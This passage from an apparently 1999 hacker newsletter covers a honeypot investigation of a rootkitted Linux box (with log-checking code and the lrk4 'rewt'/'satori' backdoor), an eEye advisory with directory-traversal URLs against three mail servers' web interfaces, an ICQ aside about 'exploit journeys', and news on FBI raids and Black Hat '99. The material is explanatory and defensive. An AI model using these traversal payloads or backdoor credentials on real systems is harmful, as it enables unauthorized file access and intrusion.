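            findings.append(("high", host, f"{sm['svc']} session for unknown account {sm['user']}"))
        if prog == "kernel" and "promiscuous mode" in msg:
            findings.append(("high", host, f"sniffer indicator: {msg}"))
    for src, hosts in hosts_per_source.items():
        if len(hosts) >= scan_threshold:
            findings.append(("medium", ",".join(sorted(hosts)),
                             f"{src} connected to {len(hosts)} hosts (network scan)"))
    return findings


def check_login_records(paths):
    """Flag login-accounting files that are missing or empty, the symptom the
    paper shows after utmp was nulled and wtmp deleted. utmp may legitimately
    be empty right after boot; wtmp should never vanish."""
    problems = []
    for p in paths:
        if not os.path.exists(p):
            problems.append((p, "missing"))
        elif os.path.getsize(p) == 0:
            problems.append((p, "empty"))
    return problems


def demo_login_record_check():
    """Build a throwaway directory that mimics the cleaned-up mozart and return
    the (basename, status) problems found there."""
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, "utmp"), "wb").close()                 # nulled: 0 bytes
        with open(os.path.join(d, "lastlog"), "wb") as f:
            f.write(b"\x00" * 292)                                   # untouched record
        paths = [os.path.join(d, n) for n in ("utmp", "wtmp", "lastlog")]
        return [(os.path.basename(p), s) for p, s in check_login_records(paths)]


if __name__ == "__main__":
    for sev, host, what in analyse(SAMPLE_LOG.splitlines()):
        print(f"[{sev:6}] {host}: {what}")
    for name, status in demo_login_record_check():
        print(f"[high  ] login record {name} is {status}")
```

Run it against the real /var/log/messages from a host you trust, not from the compromised box itself, since a trojaned syslogd can drop exactly these lines.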
Damage Control
Since our friend had disconnected, this gave me a chance to review the system and see what exactly happened. I was
extremely interested to see what was altered, and where he was logging the sniffer information. First, I quickly identified with
Tripwire which files were modified. Tripwire showed the following:
added: -rw-r--r-- root 5 Apr 27 17:01:16 1999 /usr/sbin/sniff.pid
added: -rw-r--r-- root 272 Apr 27 17:18:09 1999 /usr/sbin/tcp.log
changed: -rws--x--x root 15588 Jun 1 05:49:22 1998 /bin/login
changed: drwxr-xr-x root 20480 Apr 10 14:44:37 1999 /usr/bin
changed: -rwxr-xr-x root 52984 Jun 10 04:49:22 1998 /usr/bin/find
changed: -r-sr-sr-x root 126600 Apr 27 11:29:18 1998 /usr/bin/passwd
changed: -r-xr-xr-x root 47604 Jun 3 16:31:57 1998 /usr/bin/top
changed: -r-xr-xr-x root 9712 May 1 01:04:46 1998 /usr/bin/killall
changed: -rws--s--x root 116352 Jun 1 20:25:47 1998 /usr/bin/chfn
changed: -rws--s--x root 115828 Jun 1 20:25:47 1998 /usr/bin/chsh
changed: drwxr-xr-x root 4096 Apr 27 17:01:16 1999 /usr/sbin
changed: -rwxr-xr-x root 137820 Jun 5 09:35:06 1998 /usr/sbin/inetd
changed: -rwxr-xr-x root 7229 Nov 26 00:02:19 1998 /usr/sbin/rpc.nfsd
changed: -rwxr-xr-x root 170460 Apr 24 00:02:19 1998 /usr/sbin/in.rshd
changed: -rwxr-x--- root 235516 Apr 4 22:11:56 1999 /usr/sbin/syslogd
changed: -rwxr-xr-x root 14140 Jun 30 14:56:36 1998 /usr/sbin/tcpd
changed: drwxr-xr-x root 2048 Apr 4 16:52:55 1999 /sbin
changed: -rwxr-xr-x root 19840 Jul 9 17:56:10 1998 /sbin/ifconfig
changed: -rw-r--r-- root 649 Apr 27 16:59:54 1999 /etc/passwd
As you can see, a variety of binaries and files were modified. There were no new entries in /etc/passwd (wisely, he had
removed the crak0 and rewt accounts), so our intruder must have left a backdoor in one of the modified binaries. Also, two
files were added, /usr/sbin/sniff.pid and /usr/sbin/tcp.log. Not surprisingly, /usr/sbin/sniff.pid held the pid of the sniffer, and
/usr/sbin/tcp.log was where he was storing all of his captured information. Based on /usr/sbin/sniff.pid, the sniffer turned out to
be rpc.nfsd. Our intruder had compiled a sniffer, in this case linsniffer, and replaced rpc.nfsd with it. This ensured that if the
system was rebooted, the sniffer would be restarted by the init process. Strings confirms rpc.nfsd is the sniffer:
mozart #strings /usr/sbin/rpc.nfsd | tail -15
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
----- [CAPLEN Exceeded]
----- [Timed Out]
----- [RST]
----- [FIN]
%s =>
%s [%d]
sniff.pid
eth0
tcp.log
cant open log
rm %s
After reviewing the system and understanding what happened, I left the system alone. I was curious to see what the intruder's
next steps would be. I did not want him to know that I had caught him, so I removed all of my entries from /usr/sbin/tcp.log.
The Script Kiddie Returns
The following day our friend returned. By logging his keystrokes, I quickly identified the backdoor: /bin/login had been trojaned.
This binary, used for telnet connections, was configured to grant the account "rewt" root privileges with the password "satori".
The password "satori" is the default password for all the trojaned binaries that the rootkit lrk4 uses, a giveaway that your system
may have been compromised.
The intruder was checking on his sniffer to ensure it was still functioning. He also wanted to confirm whether any accounts had been
captured since the previous day. You can review his keystrokes at keystrokes.txt. Notice at the bottom of the log our
intruder kills the sniffer. This was the last thing he did before terminating the session. However, he quickly returned several
minutes later with another session, only to start the sniffer again. I'm not exactly sure why he did this.
This process of checking the system continued for several days. Every day the intruder would connect to the system to confirm
the sniffer was running and if it had captured any valuable data. After the fourth day, I decided that this was enough and
disconnected the system. I had learned enough from the intruder's actions and was not going to learn anything new.
Conclusion
We have seen in this paper how an intruder may act, from start to finish, once they gain root on your system. They often begin
by checking to see if anyone is on the system. Once they know the coast is clear, they cover their tracks by clearing the log files
and replacing or modifying critical files. Once they are safely hidden, they move on to new and more damaging activities. These
tactics are here to stay, as new exploits are constantly being discovered. To better protect yourself against these threats, I
recommend you armor your systems. Basic armoring will protect against most script kiddie threats, as they normally go for the
easy kill. For ideas on how to armor your system, check out Armoring Linux or Armoring Solaris. If it is too late and you feel
your system has already been compromised, a good place to start is CERT's site "Recovering from an Incident".
Author's bio
Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
@HWA
11.0 Cox Report Blasts DOE Computer Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by erewhon
In addition to revealing that China has stolen numerous
military secrets from the US, the Cox Report, unclassified
yesterday, blasts the Department of Energy on
computer security. The report blamed the DOE for giving
too much computer access to foreign nationals. The
issue is access to systems or information covered by
export control laws. While the systems or software are
not physically exported, use of the technology by some
foreign nationals is called a "deemed export" and is
covered under Department of Commerce rules.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0524/web-doe-5-25-99.html
MAY 25, 1999 . . . 18:25 EDT
House report faults DOE computer access by
foreign nationals
BY ELANA VARON (varon@fcw.com)
A report issued today about theft of U.S. nuclear secrets by China
concludes that the Energy Department has been too free in granting foreign
nationals access to its supercomputers.
The report, by the House Select Committee on U.S. National Security and
Military/Commercial Concerns With the People's Republic of China, said
DOE officials are required to review whether such access violates federal
export controls. But the report also said lab officials "lack an essential
understanding" of the export rules. The report cited interviews with Commerce
Department officials who said they did not recall ever receiving a license
application to "export" the technology from any of the labs.
Although the systems or software are not physically exported, use of the
technology by some foreign nationals is called a "deemed export" because
sending the technology overseas would require a license. The report said the
labs do not measure the power of their systems in such a way that they could
determine which systems are subject to the export rules, and lab officials never
asked Commerce how to determine if the DOE systems were subject to
export control.
The report also concluded that foreign graduate students and staff at U.S.
universities who are conducting DOE-supported research have the same
computer privileges as students who are U.S. citizens, even though some of
the foreign students are affiliated with their countries' intelligence agencies.
The report noted that DOE is preparing a counterintelligence plan that
addresses these issues.
@HWA
12.0 Black Hat Briefings Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Code Kid
Come and meet the Hackers. Secure Computing has officially announced Black Hat '99
the third annual meeting of the minds between security professionals, white and black
hat hackers. (If you are deep in the Security business and can only go to one conference
then this is it.) (And Microsoft is now a cosponsor, how ironic is that?)
PR Newswire
http://biz.yahoo.com/prnews/990525/ca_secure__1.html
BlackHat
http://www.blackhat.com/
PR Newswire;
Tuesday May 25, 8:45 am Eastern Time
Company Press Release
SOURCE: Secure Computing Corporation
Secure Computing Corporation Announces Black Hat
Briefings '99, Bringing Together Corporate and
Government Experts, and Hackers to Address Y2K And Enterprise
Security
SAN JOSE, Calif., May 25 /PRNewswire/ -- Secure Computing (Nasdaq: SCUR - news) today
announced that Secure Computing Black Hat Briefings '99, the exclusive security
conference, will take place from July 7-8, 1999 at the Venetian Hotel on the Las Vegas
Strip. This third annual conference brings corporate and government engineers and software
programmers face-to-face with today's cutting edge computer security experts and
``underground'' security specialists for two days of intensive discussions on who's
breaking in to computer networks, how they are doing it, how Y2K is affecting security,
and what can be done to address this.
The conference, with title sponsorship by Secure Computing, and lead sponsorship by
Microsoft (Nasdaq: MSFT - news), National Computer Security Center, Counterpane Systems
and Network Flight Recorders is designed to fill the need of computer professionals to
better understand the security risks to their computer and information infrastructures by
potential threats. To do this, Secure Computing assembles a group of vendor neutral
security professionals at the same forum, where they will candidly discuss and debate the
problems businesses face, and the solutions they see to those problems. Secure Computing
Black Hat Briefings '99 is not for security dilettantes or marketers looking to hawk their
vendors' wares -- just straight talk by people who make it their business to explore the
ever-changing security space.
Spanning two days, the conference has three separate tracks, two focused at technical
audiences with a third, a new ``White Hat'' track, focused at CIOs, CEOs and other
senior level people. Topics will include Y2K and what it means to system security, how to
detect and repel attacks on a network, secure programming techniques and tool selection for
creating and effectively monitoring secure networks. The intense sessions of Secure Computing
Black Hat Briefings '99 will bring to light the security problems confronting organizations
and network administrators, most of which go unnoticed by today's preoccupied
system administrators who are often more worried about network growth, updates and Y2K
problems.
Running the conference is Jeff Moss, Director of Assessment Services at Secure Computing.
Prior to joining Secure Computing, Moss was at Ernst & Young, LLP, where he was a manager
in the Information Security Services (ISS) group. Moss also successfully owned and operated
DEF CON Communications, a computer consulting company that focused on
network security solutions.
``It is crucial that we continue to educate organizations on the risks they face daily.
Network security breaches are real, and are costing organizations hundreds of millions of
dollars every year,'' said Moss. ``The coming year will be crucial for organizations
in regards to their network security. Taking a myopic approach only to the Y2K issue that
does not involve diligent attention to security could lead to severe consequences. Being
Y2K compliant really won't matter for much if an organization's network is rendered
ineffective by hacker attacks and intrusions. That is why a forum like Secure Computing
Black Hat Briefings '99 is so important in educating businesses and governments about the
very real threats that are out there.''
Presenters range from corporate and government security system managers to master hackers
themselves, including Dr. Mudge, one of the prominent members of the hacker group
'The L0pht', who is responsible for numerous advisories and tools in use in both the black
hat and white hat communities; Peter Shipley, who is well known and respected in the
professional world as well as the underground and hacker community and whose specialties
are third party penetration testing and firewall review, computer risk assessment, and
security training; and Bruce Schneier, author of Applied Cryptography and president of
Counterpane Systems.
More Information, and How to Register
Detailed information on Secure Computing Black Hat Briefings '99, including a speaker's
schedule, biographies of presenters, and information on how to register and reserve hotel
rooms, can be found via the Secure Computing Web site (http://www.securecomputing.com )
and by clicking on the Black Hat Briefings '99 icon.
About Secure Computing
Headquartered in San Jose, Calif., Secure Computing Corporation provides enterprise-wide
network security solutions to a worldwide partner and customer base in financial services,
telecom, aerospace, manufacturing, hi-tech, service providers and government agencies.
More information is available over the Internet at www.securecomputing.com or by calling:
in the U.S., 800-379-4944 or 408-918-6100; in Europe, 44-1753-826000; in Asia/Pacific,
61-2-9844-5440.
NOTE: All registration and trademarks are proprietary to their respective owners
From secure computing;
The Black Hat Briefings '99, July
7-8th Las Vegas
It's late. You're in the office alone, catching up on database
administration. Behind you, your network servers hum along quietly,
reliably. Life is good. No one can get to your data or disrupt your
WAN. The network is secure. Or is it?
The Black Hat Briefings conference has been organized to put an end
to concerns like these. While many conferences focus on information
and network security, only The Black Hat Briefings will put your
engineers and software programmers face-to-face with today's cutting
edge computer security experts and "underground" security specialists.
The "White Hat" track will inform your CEO or CIO with no-nonsense
information about what issues to be aware of, and what they can ignore.
Only the Black Hat Briefings conference will provide your people with
the tools and understanding they need to help thwart those lurking either
in the shadows of your firewall or the depths of your company's WAN.
The reality is, they are out there. The choice is yours. You can live in
fear of them. Or, you can learn from them.
Conference Overview
The Black Hat Briefings conference series was created to fill the need of computer
professionals to better understand the security risks to their computer and information
infrastructures by potential threats. To do this we assemble a group of vendor neutral
security professionals in the same room and let them talk candidly about the problems
businesses face, and the solutions they see to those problems. No gimmicks, just
straight talk by people who make it their business to explore the ever changing security
space.
Spanning two days with three separate tracks, The Black Hat Briefings will focus
on the vital security issues facing organizations with large Enterprise networks and
mixed network operating systems. Topics will include Intrusion Detection Systems
(IDS), Computer Forensics (CF) systems, Incident Response, secure programming
techniques and tool selection for creating and effectively monitoring your networks. You
will be put face to face with the people developing the tools used by and against
hackers.
This year the Black Hat Briefings has grown to include a separate track specifically
designed for the CEO and CIO. This third track, nicknamed the "White Hat" track,
was developed by the National Computer Security Center (NCSC) of the
National Security Agency. While the other tracks have a technology focus, this track
is for people who have to manage it. What should you look for when hiring an outside
security consultant? Should you even look outside your organization?
The Black Hat Briefings' intense sessions will bring to light the security and
mis-configuration problems confronting organizations and network administrators, most
of which go unnoticed by today's preoccupied system administrators where security
gets put off in lieu of constant network growth and upgrades. Our speakers will discuss
the strategies involved in correcting existing problems and speak towards what you can
expect in the future.
This year you can expect more visual demonstrations, more speakers who are
authoritative in their fields, and as always an excellent time.
As an added bonus, people who attend The Black Hat Briefings get free admission to
DEF CON 7.0, the largest Hacker convention in the US, held right after Black Hat in Las
Vegas. For more information see their web site.
Who is this conference for?
CEOs and CIOs, MIS and IT managers as well as the people doing the work. Basically
anyone dealing with the security functions at your company looking for deep insight into
the security space.
Registration Costs
Registration costs are $995 US before June 14th 1999
Late registration fees are $1,195 after June 14th.
You may cancel your registration before July 1st for a full refund.
This fee includes two days of speaking, materials, a reception, and meals.
To register, please use the button on the left hand side of this page.
We have excellent rates at the Venetian Hotel! Do not be discouraged by its
splendor!
Discount Airfare
We've got great discounts on airfare from Montrose Travel, who book bulk air travel. If you need
to still book airline tickets please give Montrose a call first.
Montrose Travel 1-800-301-9673
http://www.montrosetravel.com
They currently have deals for Black Hat attendees from the US and International on the following
airlines:
    America West, Southwest, Delta,
    American, Southwest Airlines, United Airlines
and other smaller carriers and even International Airfare rates.
Expect rates lower than published. When calling make sure you refer to The Black Hat Briefings as
the group name.
13.0 eEYe Digital Security advisory: Multiple Web Interface Security Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Multiple Web Interface Security Holes
Systems Affected
CMail 2.3
FTGate 2,1,2,1
NTMail 4.20
Release Date
May 26, 1999
Advisory Code
AD05261999
Description:
The following holes were found while testing Retina against a few various
services that have web based interfaces. The holes are nothing amazing just
common amongst many web based interfaces. We are sure some other software
will be found with similar holes... if you come across some contact
info@eeye.com and let us know.
---> CMail
The default location of the web based interface for CMail is C:\Program
Files\Computalynx\CMail Server\pages\. It is a simple hole. For example if
we were to load http://[server]:8002/../spool/username/mail.txt in our web
browser we would be looking at the email for that user. Note: Mail.txt is
not the real mail file. There is one minor problem... reading of files is
not totally straight forward. It seems CMail has some mechanism of what it
will read or not. If you have a text file with no carriage returns in it
CMail will not read it. There also exists multiple buffer overflows within
the various SMTP and POP server functions of CMail. Yes they are
exploitable. >:-]
---> FTGate
Same as above basically. http://[server]:8080/../newuser.txt The only
difference is that FTGate doesn't seem to mind if the file has the carriage
returns or not.
---> NTMail
NTMail suffers from the same programming flaw...
http://[server]:8000/../../../../../boot.ini.
There is other server software out there that suffers from these common
holes. An average of 65% of the software we have tested thus far has had
problems with restricting the path that they allow. NTMail, as well as the
other two, can be run as a service (NTMail does so by default); therefore you
can read files as SYSTEM on most of them.
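The flaw common to all three products is that the path part of the URL is joined onto the web root without checking where it ends up. The following is an added example of the check a web interface should make, not code from eEye or any of the vendors; WEB_ROOT is an assumed POSIX-style stand-in for the CMail pages directory the advisory names, and the sample request paths are the advisory's three plus encoded and backslash variants.

```python
import posixpath
from urllib.parse import unquote

# Assumed stand-in for the CMail document root named in the advisory
# (C:\Program Files\Computalynx\CMail Server\pages\), written POSIX-style.
WEB_ROOT = "/srv/cmail/pages"


def resolve_request_path(web_root, request_path):
    """Map the path part of a URL onto a file under web_root.
    Returns the normalised absolute path, or None if the request would land
    outside the root (the ../ flaw the advisory describes)."""
    # Decode percent-encoding exactly once; decoding again after the check
    # would let "%252e%252e" become ".." when the file is actually opened.
    decoded = unquote(request_path)
    # The affected products run on Windows, whose file APIs accept "\" as
    # well as "/", so treat both as separators before normalising.
    decoded = decoded.replace("\\", "/")
    if "\x00" in decoded:                       # a NUL would truncate a C path
        return None
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # After normalisation the only acceptable results are the root itself or
    # something strictly below it; "root + '/'" stops "/srv/cmail/pages2".
    # (A real server should also realpath() the result to defeat symlinks.)
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def classify(web_root, request_paths):
    """Label each request path 'ok' or 'denied', e.g. for an access-log audit."""
    return {p: ("ok" if resolve_request_path(web_root, p) else "denied")
            for p in request_paths}


if __name__ == "__main__":
    samples = [
        "/index.html",
        "/../spool/username/mail.txt",      # CMail case from the advisory
        "/../newuser.txt",                  # FTGate case
        "/../../../../../boot.ini",         # NTMail case
        "/%2e%2e/%2e%2e/boot.ini",          # percent-encoded dots
        "/..\\..\\boot.ini",                # backslash separators
        "/sub/../index.html",               # dot-dot that stays inside the root
    ]
    for path, verdict in classify(WEB_ROOT, samples).items():
        print(f"{verdict:6} {path}")
```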
Fixes
Disable the web interfaces where applicable until the vendors release
patches.
Vendor Status
All vendors have been notified.
Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
Disclaimer:
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
http://www.eEye.com
@HWA
14.0 Fun with ICQ
~~~~~~~~~~~~
Just stumbled across this site in my travels, has some interesting info check
'em out....
From http://home.earthlink.net/~childzplay/comp.html
Although Mirabilis says they do not recommend using 99a yet, I've been using
it for about 1 month and haven't had any trouble with it. Some other people I
know have not been so lucky. I guess it is a use at your own risk deal until they
officially release the 99a final version.
If you didn't know, the server that comes as default in v.99a is watched closely
by Mirabilis. Therefore, if you want to go on an exploit journey, I would suggest
connecting up to a more stable, and less watched server. Here are some for your
entertainment:
@HWA
15.0 FBI raids suspected hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Received: by hackernews (mbox contact) (with Cubic Circle's
cucipop (v1.31 1998/05/13) Thu May 27 15:40:08 1999)
X-From_: [deleted]@hotmail.com Wed May 26 16:20:14 1999
Delivered-To: submit@hackernews.com
Received: from hotmail.com (law2-f208.hotmail.com
[216.32.XXX.XXX])
by hackernews.com (Postfix) with SMTP id A87D4469F for
; Wed, 26 May 1999 16:20:13 -0500 (EST)
Received: (qmail 39781 invoked by uid 0); 26 May 1999 21:23:12
-0000
Message-ID: <1999052621.39780.qmail@hotmail.com>
Received: from 192.116.XXX.XXX by www.hotmail.com with HTTP;
Wed, 26 May 1999 14:23:11 PDT
X-Originating-IP: [192.116.XXX.XXX]
From: "[deleted]" <[deleted]@hotmail.com>
To: submit@hackernews.com
Subject: www.fbi.gov IS DEAD
Date: Wed, 26 May 1999 21:23:11 GMT
Mime-Version: 1.0
Content-type: text/plain; format=flowed;
Return-Path:
Date: 5/26/99 17:23
Received: 5/27/99 16:48
From: [deleted]@hotmail.com
To: submit@hackernews.com
FBI WILL NOT FUCKIN WITH MY FRIENDS FROM GLOBAL HELL (gH)
www.fbi.gov IS DEAD
im the Israeli ghost and yes i am from israel
the fbi will stop hunting hackers
gangsters dont dance we boggy
today is the 25.5.99 israeli time is : 00:22
www.fbi.gov will stay down all day !
the Israeli Ghost
_______________________________________________________________
Get Free Email and Do More On The Web. Visit http://www.msn.com
FBI Raids Suspected Crackers.
contributed by darkscent
It is often difficult to separate the fact from the fiction,
rumors, supposition, and unsubstantiated allegations
that fly around the net when big news breaks. This is
what HNN has been able to verify so far. Yesterday
morning at approx. 6:00 am CST the FBI executed nine
search warrants in Houston, Seattle and various
California locations. HNN believes that some of those
who were raided were iCBM, MostHated, loophole,
Spaceg0at, soulblazer, fryz, vallah and Cl0pz. HNN has
not learned of any arrests that have been made. While
the FBI has not revealed why the search warrants were
executed it is believed to have some relation to the
recent crack of whitehouse.gov. HNN has received no
confirmation of Most Wanted lists or FBI Directives,
rumors of which have been floating around the net.
MSNBC
http://www.msnbc.com/news/273819.asp
In response to the recent raids several other members
of gH (Global Hell) as well as other groups such as Team
spl0it have attacked numerous web sites, (estimates
range from between 40 and 100). The FBI has admitted
to receiving a major Denial of Service attack, and the
US Senate web site was defaced for a few minutes. In
an interview with MSNBC MostHated said "The
retaliation has to stop." HNN received an email from
"Israeli Ghost" claiming responsibility for the FBI DoS
attack. HNN was also able to snag the US Senate web
page defacement before it was restored.
Nando Times
http://www.techserver.com/story/body/0,1634,53692-86005-610419-0,00.html
CNN
http://www.cnn.com/TECH/computing/9905/27/senate.hackers/
C|Net
http://www.news.com/News/Item/0,4,37138,00.html?owv
Israeli Ghost Email
http://www.hackernews.com/orig/ghost.html
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
Last week, a gH member Zyklon (Eric Burns), was
indicted in connection with three separate attacks on
Virginia area systems owned by Computer Tech
Services, Issue Dynamics, and Electric Press which
housed the web site of the United States Information
Agency. The Seattle Times has run a biographical piece
on Zyklon. The story has quotes from his classmates
and parents.
Seattle Times
http://www.seattletimes.com/news/local/html98/hack_19990525.html
Zyklon's Indictment
http://www.hackernews.com/orig/zyklon.html
MSNBC:
Feds vs. hackers: The battle widens
FBI and Senate shut down Web sites after a series of attacks;
skirmishes waged with search warrants and Internet sieges
By Brock Meeks, Alan Boyle and Bob Sullivan
MSNBC
May 28 Computer attacks on the FBI and U.S.
Senate Web sites are leading to a broader
criminal investigation into such intrusions,
officials indicated Friday. The latest skirmish
between federal authorities and Web site
attackers began Wednesday with FBI raids on
purported members of a group called gH, or
Global Hell, in at least three states and has
continued with a protest campaign targeting a
wide spectrum of Internet sites.
THE FBI and Senate Web sites remained inaccessible
Friday as a result of the computer attacks. The FBI shut
down its Web site Wednesday after it was swamped by a
denial-of-service attack.
The Senate took its site offline Thursday night after
attackers broke into the public computer server and
replaced the congressional body's home page with a screed
against the FBI.
The hacked page claimed credit on behalf of a group
known as the Masters of Downloading, or M0D and
denigrated the FBI as well as Global Hell.
"The FBI may be all over the other groups like ... gH
and tK. ... M0D make those morons look like a group of
special-ed students! FBI vs. M0D in 99, bring it on!" read
the page, which was peppered with ruder comments and
hacker lingo.
"The intrusion compromised our Senate Internet Web
site, and as a result the Senate has taken down our Web
page to do some investigation," said Sherry Little, a
spokeswoman for the Senate sergeant-at-arms, who
manages the site.
She said FBI agents were heading up the investigation.
"They're looking at the criminal aspects of it," she told
MSNBC. "They're in charge of the investigation, in that
they're trying to determine where it came from and whether
there was any connection at all to any incidents that they've
explored in the past."
The Web outage rendered the official home pages of all
100 senators and senatorial committees inaccessible, but
e-mail and other computer services not related to the public
Web site were unaffected, Little said.
System administrators for the FBI and the Senate Web
sites were beefing up site security during the down time
and no one could say exactly when the sites would be
returned to service. "We're not expecting this to be a
long-term problem," Little said.
The FBI was continuing its investigation into the attack
on its own Web site, said Dave Miller, a media
representative at the bureau's national office. He confirmed
that this could result in criminal penalties.
Although he declined to provide specifics on the
investigation, Miller told MSNBC that it would be a logical
point that the FBI would look for connections to past
attacks on federal Web sites.
Earlier this month, Global Hell was implicated in
attacks on a variety of U.S. government sites, including sites
for the White House, several Cabinet departments and the
U.S. Information Agency. Last week, Global Hell member
Eric Burns (who also goes by the name Zyklon), was
arrested in connection with three attacks on government
computers.
Members of Global Hell reported that law-enforcement
officials served search warrants early Wednesday in Seattle,
Houston and California.
In Houston, FBI spokesman Rolando Moss told
MSNBC that agents were investigating allegations of
computer intrusions involving a teen-ager who uses the
hacker handle Mosthated. He said the investigation was
continuing and declined further comment.
In telephone conversations with MSNBC, Mosthated
said that his home was raided at about 6 a.m. CT
Wednesday, and that family computer equipment was
confiscated. He said his parents were "really mad. ... The
computer had all their financial information and stuff on it."
Mosthated's mother got on the line to read from the FBI's
receipt for the equipment and confirm that she was really
mad.
Mosthated said at least eight other people around the
country had been served with search warrants as part of a
huge hacker crackdown. Four other Houston-area
hackers, three in California and one in Seattle reportedly
received FBI visits. None was arrested, but all had
computer equipment confiscated, he said.
An FBI representative in San Diego said she could not
comment on the investigation because the paperwork was
sealed. Inquiries with the bureau's Seattle office met with a
similar response: "Right now there are still things that need
to be decided," one agent told MSNBC on condition of
anonymity.
White House Web site shut down
The bureau's Web site went out of service only hours
after the raids.
According to AntiOnline, a computer security site, an
individual calling himself "Israeli Ghost" was taking credit for
the attack on the FBIs site.
"FBI will not (profanity deleted) with my friends from
Global Hell," the hacker allegedly wrote in an e-mail to
AntiOnline.
Other members of the hacking community, contacted
by MSNBC, said the FBI site was hit by what's called a
denial-of-service attack. In such an attack, the host
computer is not actually controlled by an outsider; rather,
outsiders bombard a Web site with so many simultaneous
hits that it becomes overwhelmed and can no longer
function.
Mosthated said he didn't know who was responsible
for the denial-of-service attack. The FBI did ask some
cursory questions about this month's attack on the White
House Web site. He said he was shown printouts of Web
stories about the incident from MSNBC and CNN. But
"they didn't really push those questions," Mosthated said.
As the day went on, other Web sites, none of which
had any apparent connection to the FBI, were defaced.
A correspondent claiming to be a Global Hell member
called Infamous sent an e-mail message to MSNBC
Wednesday night criticizing the FBI and saying he "defaced
over 40 web domains today to state my opinion." The
writer's identity could not be confirmed, however.
THIS NEEDS TO STOP
The response to the raids has spread through the digital
underground and taken on a life of its own, a spontaneous
act of retaliation that wasn't asked for.
"The retaliation has to stop," Mosthated said. "All this
... needs to stop. Have you seen all the Web pages that
have been changed in the last hour? Someone told me that
there's been more than a hundred," he said.
"This (retaliation) is just going to look worse on the
people that did get raided," said the 18-year-old
Mosthated, who says he stopped hacking last summer to
set up his own security firm.
"This impromptu show of support is going to backfire,"
he told MSNBC. "Everything that gH has done is going to
be put on my shoulders," owing to his position as the
group's founder.
The FBI agents who executed a search warrant on
Mosthated said they were looking for evidence related to
illegal telecom activity, he said, in particular illegally set-up
conference calls. "The FBI told me some company lost
$250,000 because of the illegal conference calling activity,"
he said.
Mosthated and other sources indicated that the FBI
appeared to be targeting other figures prominent in the
hacker community. AntiOnline published a list of almost 100
computer handles, purportedly taken from directives sent by
the FBI to Internet service providers.
Seattle Times;
Posted at 12:02 p.m. PDT; Tuesday, May 25, 1999
Suspect was star hacker on the
Internet but shy and lonely in real life
by Roberto Sanchez
Seattle Times staff reporter
In the world of computers, he was Zyklon, the
aggressive "cracker" named after a poison gas,
who had the skill to break into the Web sites
of movie studios, universities and even the
Chinese government.
But on the other side of the monitor -
according to federal prosecutors - Zyklon was
really Eric Burns, a lanky, shy, 19-year-old, a
former student at Shorewood High School with few friends,
several run-ins with the law, and an unhealthy obsession with a
woman who didn't know anything about him.
Burns last week was indicted by a federal grand jury in
Alexandria, Va., on three counts of computer intrusion.
Prosecutors say Burns broke into hundreds of Web pages,
altered files and caused thousands of dollars in damage. They say
he often left behind text taunting his victims and professing his
unrequited love for the woman, a former high-school classmate.
Burns lives in Shoreline. But he was indicted in the Washington,
D.C., suburb because that's where the compromised computer
systems are located.
Burns and his parents, Alice and Edward, did not return calls for
comment. His lawyer, Ralph Hurvitz, advised his client not to give
interviews. He said Burns will plead not guilty.
Acquaintances of Burns - who also took classes at Shoreline
Community College last year - describe him as the stereotypical
computer nerd: shy, didn't talk to many people, had few friends
and spent much of his time on the computer.
"He was very smart, one of the smartest kids I know," said David
Thompson, a member of Shorewood's class of 1998. "Eric knew
and knows so much about computers. He's kind of a freak that
way."
Even the woman, whom Burns idolized in practically every Web
site he hacked, said she had never talked to or been personally
approached by Burns.
"I didn't know who he was or what he did," she said.
She said she took one law class with him her senior year of high
school. After that, she began to receive letters from him, then gifts.
Court records say she received a crystal bell and a diamond
necklace, which her family returned.
"Halfway through my senior year, someone called my house and
told me to look up this (Web) address" for some of his
handiwork, the woman said. She never did.
She said she didn't go to the police or seek a restraining order
because Burns didn't seem dangerous.
"He never did anything to threaten me," she said.
A former friend said Burns had a mean side, which he often
expressed in his hacking and "cracking" - the term for breaking
into Web sites.
"He was into it for the power," said Eric Lindvall, a former student
at Shorewood who was a friend of Burns' in 1994. He said he,
Burns and two other students spent much of their free time
together, breaking into computer or phone systems, getting access
to credit-card numbers and phone accounts.
Lindvall said he and Burns actually got caught by FBI agents in
1994 when they used a stolen credit-card number to buy
computer equipment. They were not prosecuted, and he said he
stopped spending time with Burns after that.
Lindvall also said Burns and two other students were arrested in
1996 for allegedly using stolen credit-card numbers to buy
computer gear, then reselling it to stores or individuals. Again,
Burns was not prosecuted, he said.
An affidavit filed by the U.S. Attorney said Burns bragged online
to an acquaintance about getting caught for credit fraud as a
minor. The Shoreline Week, a community newspaper, published a
story Oct. 2, 1996, about three Shoreline teens arrested for credit
fraud.
Whatever popularity Burns lacked in the real world, he made up
for on the Internet. His alleged exploits were regularly featured in
Web sites dedicated to computer hacking. Some people even
admired him; a cracker who defaced the University of
Washington's engineering Web site in April dedicated the deed to
Zyklon.
Zyklon apparently took his name from the gas used by Nazi
Germany to exterminate Jews.
Burns will be arraigned on June 14. If guilty, he faces up to 15
years in prison.
Roberto Sanchez's phone message number is 206-464-8522.
Copyright © 1999 Seattle Times Company
@HWA
15.1 Real life hacker wargames
